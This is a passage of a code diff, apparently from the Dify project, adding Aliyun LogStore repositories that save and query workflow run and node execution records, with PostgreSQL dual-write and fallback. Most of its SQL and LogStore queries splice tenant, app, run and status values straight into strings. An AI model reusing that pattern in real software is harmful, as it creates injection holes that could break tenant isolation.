+ + Args: + tenant_id: Tenant identifier for multi-tenant isolation + app_id: Application identifier + triggered_from: Filter by trigger source(s) + limit: Maximum number of records to return (default: 20) + last_id: Cursor for pagination - ID of the last record from previous page + status: Optional filter by status + + Returns: + InfiniteScrollPagination object + """ + logger.debug( + "get_paginated_workflow_runs: tenant_id=%s, app_id=%s, limit=%d, status=%s", + tenant_id, + app_id, + limit, + status, + ) + # Convert triggered_from to list if needed + if isinstance(triggered_from, WorkflowRunTriggeredFrom): + triggered_from_list = [triggered_from] + else: + triggered_from_list = list(triggered_from) + + # Build triggered_from filter + triggered_from_filter = " OR ".join([f"triggered_from='{tf.value}'" for tf in triggered_from_list]) + + # Build status filter + status_filter = f"AND status='{status}'" if status else "" + + # Build last_id filter for pagination + # Note: This is simplified. 
In production, you'd need to track created_at from last record + last_id_filter = "" + if last_id: + # TODO: Implement proper cursor-based pagination with created_at + logger.warning("last_id pagination not fully implemented for LogStore") + + # Use window function to get latest log_version of each workflow run + sql = f""" + SELECT * FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND ({triggered_from_filter}) + {status_filter} + {last_id_filter} + ) t + WHERE rn = 1 + ORDER BY created_at DESC + LIMIT {limit + 1} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore, from_time=None, to_time=None + ) + + # Check if there are more records + has_more = len(results) > limit + if has_more: + results = results[:limit] + + # Convert results to WorkflowRun models + workflow_runs = [_dict_to_workflow_run(row) for row in results] + return InfiniteScrollPagination(data=workflow_runs, limit=limit, has_more=has_more) + + except Exception: + logger.exception("Failed to get paginated workflow runs from LogStore") + raise + + def get_workflow_run_by_id( + self, + tenant_id: str, + app_id: str, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID with tenant and app isolation. + + Uses query syntax to get raw logs and selects the one with max log_version in code. + Falls back to PostgreSQL if not found in LogStore (for data consistency during migration). 
+ """ + logger.debug("get_workflow_run_by_id: tenant_id=%s, app_id=%s, run_id=%s", tenant_id, app_id, run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND tenant_id = '{tenant_id}' AND app_id = '{app_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id} and tenant_id: {tenant_id} and app_id: {app_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug( + "WorkflowRun not found in LogStore, falling back to PostgreSQL: " + "run_id=%s, tenant_id=%s, app_id=%s", + run_id, + tenant_id, + app_id, + ) + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run by ID from LogStore: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if 
dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + except Exception: + logger.exception( + "PostgreSQL fallback also failed: run_id=%s, tenant_id=%s, app_id=%s", run_id, tenant_id, app_id + ) + raise + + def _fallback_get_workflow_run_by_id_with_tenant( + self, run_id: str, tenant_id: str, app_id: str + ) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore (with tenant isolation).""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where( + WorkflowRun.id == run_id, WorkflowRun.tenant_id == tenant_id, WorkflowRun.app_id == app_id + ) + return session.scalar(stmt) + + def get_workflow_run_by_id_without_tenant( + self, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID without tenant/app context. + Uses query syntax to get raw logs and selects the one with max log_version. + Falls back to PostgreSQL if not found in LogStore (controlled by LOGSTORE_DUAL_READ_ENABLED). 
+ """ + logger.debug("get_workflow_run_by_id_without_tenant: run_id=%s", run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug("WorkflowRun not found in LogStore, falling back to PostgreSQL: run_id=%s", run_id) + return self._fallback_get_workflow_run_by_id(run_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run without tenant: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id(run_id) + except Exception: + logger.exception("PostgreSQL fallback also failed: run_id=%s", run_id) + raise + + def 
_fallback_get_workflow_run_by_id(self, run_id: str) -> WorkflowRun | None:
+        """Fallback to PostgreSQL query for records not in LogStore."""
+        from sqlalchemy import select
+        from sqlalchemy.orm import Session
+
+        from extensions.ext_database import db
+
+        with Session(db.engine) as session:
+            stmt = select(WorkflowRun).where(WorkflowRun.id == run_id)
+            return session.scalar(stmt)
+
+    def get_workflow_runs_count(
+        self,
+        tenant_id: str,
+        app_id: str,
+        triggered_from: str,
+        status: str | None = None,
+        time_range: str | None = None,
+    ) -> dict[str, int]:
+        """
+        Get workflow runs count statistics grouped by status.
+
+        Optimization: Use finished_at IS NOT NULL for completed runs (10-50x faster)
+        """
+        logger.debug(
+            "get_workflow_runs_count: tenant_id=%s, app_id=%s, triggered_from=%s, status=%s",
+            tenant_id,
+            app_id,
+            triggered_from,
+            status,
+        )
+        # Build time range filter
+        time_filter = ""
+        if time_range:
+            # TODO: Parse time_range and convert to from_time/to_time
+            logger.warning("time_range filter not implemented")
+
+        # If status is provided, simple count
+        if status:
+            if status == "running":
+                # Running status requires window function
+                sql = f"""
+                    SELECT COUNT(*) as count
+                    FROM (
+                        SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn
+                        FROM {AliyunLogStore.workflow_execution_logstore}
+                        WHERE tenant_id='{tenant_id}'
+                        AND app_id='{app_id}'
+                        AND triggered_from='{triggered_from}'
+                        AND status='running'
+                        {time_filter}
+                    ) t
+                    WHERE rn = 1
+                """
+            else:
+                # Finished status uses optimized filter
+                sql = f"""
+                    SELECT COUNT(DISTINCT id) as count
+                    FROM {AliyunLogStore.workflow_execution_logstore}
+                    WHERE tenant_id='{tenant_id}'
+                    AND app_id='{app_id}'
+                    AND triggered_from='{triggered_from}'
+                    AND status='{status}'
+                    AND finished_at IS NOT NULL
+                    {time_filter}
+                """
+
+            try:
+                results = self.logstore_client.execute_sql(
+                    sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore
+                )
+                count = int(results[0]["count"]) if results and len(results) > 0 else 0  # int(): execute_sql returns values as strings
+
+                return {
+                    "total": count,
+                    "running": count if status == "running" else 0,
+                    "succeeded": count if status == "succeeded" else 0,
+                    "failed": count if status == "failed" else 0,
+                    "stopped": count if status == "stopped" else 0,
+                    "partial-succeeded": count if status == "partial-succeeded" else 0,
+                }
+            except Exception:
+                logger.exception("Failed to get workflow runs count")
+                raise
+
+        # No status filter - get counts grouped by status
+        # Use optimized query for finished runs, separate query for running
+        try:
+            # Count finished runs grouped by status
+            finished_sql = f"""
+                SELECT status, COUNT(DISTINCT id) as count
+                FROM {AliyunLogStore.workflow_execution_logstore}
+                WHERE tenant_id='{tenant_id}'
+                AND app_id='{app_id}'
+                AND triggered_from='{triggered_from}'
+                AND finished_at IS NOT NULL
+                {time_filter}
+                GROUP BY status
+            """
+
+            # Count running runs
+            running_sql = f"""
+                SELECT COUNT(*) as count
+                FROM (
+                    SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn
+                    FROM {AliyunLogStore.workflow_execution_logstore}
+                    WHERE tenant_id='{tenant_id}'
+                    AND app_id='{app_id}'
+                    AND triggered_from='{triggered_from}'
+                    AND status='running'
+                    {time_filter}
+                ) t
+                WHERE rn = 1
+            """
+
+            finished_results = self.logstore_client.execute_sql(
+                sql=finished_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore
+            )
+            running_results = self.logstore_client.execute_sql(
+                sql=running_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore
+            )
+
+            # Build response
+            status_counts = {
+                "running": 0,
+                "succeeded": 0,
+                "failed": 0,
+                "stopped": 0,
+                "partial-succeeded": 0,
+            }
+
+            total = 0
+            for result in finished_results:
+                status_val = result.get("status")
+                count = int(result.get("count") or 0)  # int(): execute_sql stringifies values; "total += count" needs an int
+                if status_val in status_counts:
+                    status_counts[status_val] = count
+                    total += count
+
+            # Add running count
+            running_count = int(running_results[0]["count"]) if running_results 
and len(running_results) > 0 else 0 + status_counts["running"] = running_count + total += running_count + + return {"total": total} | status_counts + + except Exception: + logger.exception("Failed to get workflow runs count") + raise + + def get_daily_runs_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyRunsStats]: + """ + Get daily runs statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT id) (20-100x faster) + """ + logger.debug( + "get_daily_runs_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", tenant_id, app_id, triggered_from + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + # Optimized query: Use finished_at filter to avoid window function + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT id) as runs + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "runs": row.get("runs", 0)}) + + return cast(list[DailyRunsStats], response_data) + + except Exception: + logger.exception("Failed to get daily runs statistics") + raise + + def get_daily_terminals_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + 
timezone: str = "UTC", + ) -> list[DailyTerminalsStats]: + """ + Get daily terminals statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT created_by) (20-100x faster) + """ + logger.debug( + "get_daily_terminals_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT created_by) as terminal_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "terminal_count": row.get("terminal_count", 0)}) + + return cast(list[DailyTerminalsStats], response_data) + + except Exception: + logger.exception("Failed to get daily terminals statistics") + raise + + def get_daily_token_cost_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTokenCostStats]: + """ + Get daily token cost statistics using optimized query. 
+ + Optimization: Use finished_at IS NOT NULL + SUM(total_tokens) (20-100x faster) + """ + logger.debug( + "get_daily_token_cost_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, SUM(total_tokens) as token_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "token_count": row.get("token_count", 0)}) + + return cast(list[DailyTokenCostStats], response_data) + + except Exception: + logger.exception("Failed to get daily token cost statistics") + raise + + def get_average_app_interaction_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[AverageInteractionStats]: + """ + Get average app interaction statistics using optimized query. 
+ + Optimization: Use finished_at IS NOT NULL + AVG (20-100x faster) + """ + logger.debug( + "get_average_app_interaction_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT + AVG(sub.interactions) AS interactions, + sub.date + FROM ( + SELECT + DATE(from_unixtime(__time__)) AS date, + created_by, + COUNT(DISTINCT id) AS interactions + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date, created_by + ) sub + GROUP BY sub.date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append( + { + "date": str(row.get("date", "")), + "interactions": float(row.get("interactions", 0)), + } + ) + + return cast(list[AverageInteractionStats], response_data) + + except Exception: + logger.exception("Failed to get average app interaction statistics") + raise diff --git a/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py new file mode 100644 index 0000000000..6e6631cfef --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py @@ -0,0 +1,164 @@ +import json +import logging +import os +import time +from typing import Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.repositories.sqlalchemy_workflow_execution_repository import 
SQLAlchemyWorkflowExecutionRepository +from core.workflow.entities import WorkflowExecution +from core.workflow.repositories.workflow_execution_repository import WorkflowExecutionRepository +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, +) +from models.enums import WorkflowRunTriggeredFrom + +logger = logging.getLogger(__name__) + + +class LogstoreWorkflowExecutionRepository(WorkflowExecutionRepository): + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowRunTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (DEBUGGING or APP_RUN) + """ + logger.debug( + "LogstoreWorkflowExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + # Note: Project/logstore/index initialization is done at app startup via ext_logstore + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = 
SQLAlchemyWorkflowExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowExecution) -> list[tuple[str, str]]: + """ + Convert a domain model to a logstore model (List[Tuple[str, str]]). + + Args: + domain_model: The domain model to convert + + Returns: + The logstore model as a list of key-value tuples + """ + logger.debug( + "_to_logstore_model: id=%s, workflow_id=%s, status=%s", + domain_model.id_, + domain_model.workflow_id, + domain_model.status.value, + ) + # Use values from constructor if provided + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + logstore_model = [ + ("id", domain_model.id_), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("type", domain_model.workflow_type.value), + ("version", domain_model.workflow_version), + ("graph", json.dumps(domain_model.graph, ensure_ascii=False) if domain_model.graph else "{}"), + ("inputs", json.dumps(domain_model.inputs, ensure_ascii=False) if domain_model.inputs else "{}"), + ("outputs", json.dumps(domain_model.outputs, ensure_ascii=False) if 
domain_model.outputs else "{}"), + ("status", domain_model.status.value), + ("error_message", domain_model.error_message or ""), + ("total_tokens", str(domain_model.total_tokens)), + ("total_steps", str(domain_model.total_steps)), + ("exceptions_count", str(domain_model.exceptions_count)), + ( + "created_by_role", + self._creator_user_role.value + if hasattr(self._creator_user_role, "value") + else str(self._creator_user_role), + ), + ("created_by", self._creator_user_id), + ("started_at", domain_model.started_at.isoformat() if domain_model.started_at else ""), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowExecution) -> None: + """ + Save or update a WorkflowExecution domain entity to the logstore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Persists the logstore model using Aliyun SLS + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. 
Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Args: + execution: The WorkflowExecution domain entity to persist + """ + logger.debug( + "save: id=%s, workflow_id=%s, status=%s", execution.id_, execution.workflow_id, execution.status.value + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_execution_logstore, logstore_model) + + logger.debug("Saved workflow execution to logstore: id=%s", execution.id_) + except Exception: + logger.exception("Failed to save workflow execution to logstore: id=%s", execution.id_) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved workflow execution to SQL database: id=%s", execution.id_) + except Exception: + logger.exception("Failed to dual-write workflow execution to SQL database: id=%s", execution.id_) + # Don't raise - LogStore write succeeded, SQL is just a backup diff --git a/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py new file mode 100644 index 0000000000..400a089516 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py @@ -0,0 +1,366 @@ +""" +LogStore implementation of the WorkflowNodeExecutionRepository. + +This module provides a LogStore-based repository for WorkflowNodeExecution entities, +using Aliyun SLS LogStore with append-only writes and version control. 
+""" + +import json +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.model_runtime.utils.encoders import jsonable_encoder +from core.repositories import SQLAlchemyWorkflowNodeExecutionRepository +from core.workflow.entities import WorkflowNodeExecution +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionMetadataKey, WorkflowNodeExecutionStatus +from core.workflow.enums import NodeType +from core.workflow.repositories.workflow_node_execution_repository import OrderConfig, WorkflowNodeExecutionRepository +from core.workflow.workflow_type_encoder import WorkflowRuntimeTypeConverter +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, + WorkflowNodeExecutionTriggeredFrom, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution(data: dict[str, Any]) -> WorkflowNodeExecution: + """ + Convert LogStore result dictionary to WorkflowNodeExecution domain model. 
+ + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecution domain model instance + """ + logger.debug("_dict_to_workflow_node_execution: data keys=%s", list(data.keys())[:5]) + # Parse JSON fields + inputs = json.loads(data.get("inputs", "{}")) + process_data = json.loads(data.get("process_data", "{}")) + outputs = json.loads(data.get("outputs", "{}")) + metadata = json.loads(data.get("execution_metadata", "{}")) + + # Convert metadata to domain enum keys + domain_metadata = {} + for k, v in metadata.items(): + try: + domain_metadata[WorkflowNodeExecutionMetadataKey(k)] = v + except ValueError: + # Skip invalid metadata keys + continue + + # Convert status to domain enum + status = WorkflowNodeExecutionStatus(data.get("status", "running")) + + # Parse datetime fields + created_at = datetime.fromisoformat(data.get("created_at", "")) if data.get("created_at") else datetime.now() + finished_at = datetime.fromisoformat(data.get("finished_at", "")) if data.get("finished_at") else None + + return WorkflowNodeExecution( + id=data.get("id", ""), + node_execution_id=data.get("node_execution_id"), + workflow_id=data.get("workflow_id", ""), + workflow_execution_id=data.get("workflow_run_id"), + index=int(data.get("index", 0)), + predecessor_node_id=data.get("predecessor_node_id"), + node_id=data.get("node_id", ""), + node_type=NodeType(data.get("node_type", "start")), + title=data.get("title", ""), + inputs=inputs, + process_data=process_data, + outputs=outputs, + status=status, + error=data.get("error"), + elapsed_time=float(data.get("elapsed_time", 0.0)), + metadata=domain_metadata, + created_at=created_at, + finished_at=finished_at, + ) + + +class LogstoreWorkflowNodeExecutionRepository(WorkflowNodeExecutionRepository): + """ + LogStore implementation of the WorkflowNodeExecutionRepository interface. 
+ + This implementation uses Aliyun SLS LogStore with an append-only write strategy: + - Each save() operation appends a new record with a version timestamp + - Updates are simulated by writing new records with higher version numbers + - Queries retrieve the latest version using finished_at IS NOT NULL filter + - Multi-tenancy is maintained through tenant_id filtering + + Version Strategy: + version = time.time_ns() # Nanosecond timestamp for unique ordering + """ + + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowNodeExecutionTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (SINGLE_STEP or WORKFLOW_RUN) + """ + logger.debug( + "LogstoreWorkflowNodeExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowNodeExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore 
and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowNodeExecution) -> Sequence[tuple[str, str]]: + logger.debug( + "_to_logstore_model: id=%s, node_id=%s, status=%s", + domain_model.id, + domain_model.node_id, + domain_model.status.value, + ) + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + json_converter = WorkflowRuntimeTypeConverter() + + logstore_model = [ + ("id", domain_model.id), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("workflow_run_id", domain_model.workflow_execution_id or ""), + ("index", str(domain_model.index)), + ("predecessor_node_id", domain_model.predecessor_node_id or ""), + ("node_execution_id", domain_model.node_execution_id or ""), + ("node_id", domain_model.node_id), + ("node_type", domain_model.node_type.value), + ("title", domain_model.title), + ( + "inputs", + json.dumps(json_converter.to_json_encodable(domain_model.inputs), ensure_ascii=False) + if domain_model.inputs + else "{}", + ), + ( + "process_data", + json.dumps(json_converter.to_json_encodable(domain_model.process_data), ensure_ascii=False) + if domain_model.process_data + else "{}", + ), + ( + "outputs", + 
json.dumps(json_converter.to_json_encodable(domain_model.outputs), ensure_ascii=False) + if domain_model.outputs + else "{}", + ), + ("status", domain_model.status.value), + ("error", domain_model.error or ""), + ("elapsed_time", str(domain_model.elapsed_time)), + ( + "execution_metadata", + json.dumps(jsonable_encoder(domain_model.metadata), ensure_ascii=False) + if domain_model.metadata + else "{}", + ), + ("created_at", domain_model.created_at.isoformat() if domain_model.created_at else ""), + ("created_by_role", self._creator_user_role.value), + ("created_by", self._creator_user_id), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update a NodeExecution domain entity to LogStore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Appends a new record with a log_version timestamp + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Each save operation creates a new record. Updates are simulated by writing + new records with higher log_version numbers. 
+ + Args: + execution: The NodeExecution domain entity to persist + """ + logger.debug( + "save: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_node_execution_logstore, logstore_model) + + logger.debug( + "Saved node execution to LogStore: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + except Exception: + logger.exception( + "Failed to save node execution to LogStore: id=%s, node_execution_id=%s", + execution.id, + execution.node_execution_id, + ) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved node execution to SQL database: id=%s", execution.id) + except Exception: + logger.exception("Failed to dual-write node execution to SQL database: id=%s", execution.id) + # Don't raise - LogStore write succeeded, SQL is just a backup + + def save_execution_data(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update the inputs, process_data, or outputs associated with a specific + node_execution record. + + For LogStore implementation, this is similar to save() 